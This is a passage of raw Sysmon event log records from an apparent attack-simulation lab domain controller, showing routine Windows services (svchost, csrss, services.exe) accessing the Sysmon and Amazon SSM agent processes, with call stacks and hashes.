(x86)\nxlog\nxlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001278Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-2800-000000007F01}2764C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001277Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-169F-5F84-0A00-000000007F01}856948C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2800-000000007F01}2764C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001276Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.882{5D479F2C-16B1-5F84-2800-000000007F01}2764C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=D99D0B786003034B7255BA854D2750DF,SHA256=E59FC75594AA351583476F38E8C008C2AD2119C229D9C4540EFE17AFAEF7ED34,IMPHASH=F0070935B15A909B9DC00BE7997E6112{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001275Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001274Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001273Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001272Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001271Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001270Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001269Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001268Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001267Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001266Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001265Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001264Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001263Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001262Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001261Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001260Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001259Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001258Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001257Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001256Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001255Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001254Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6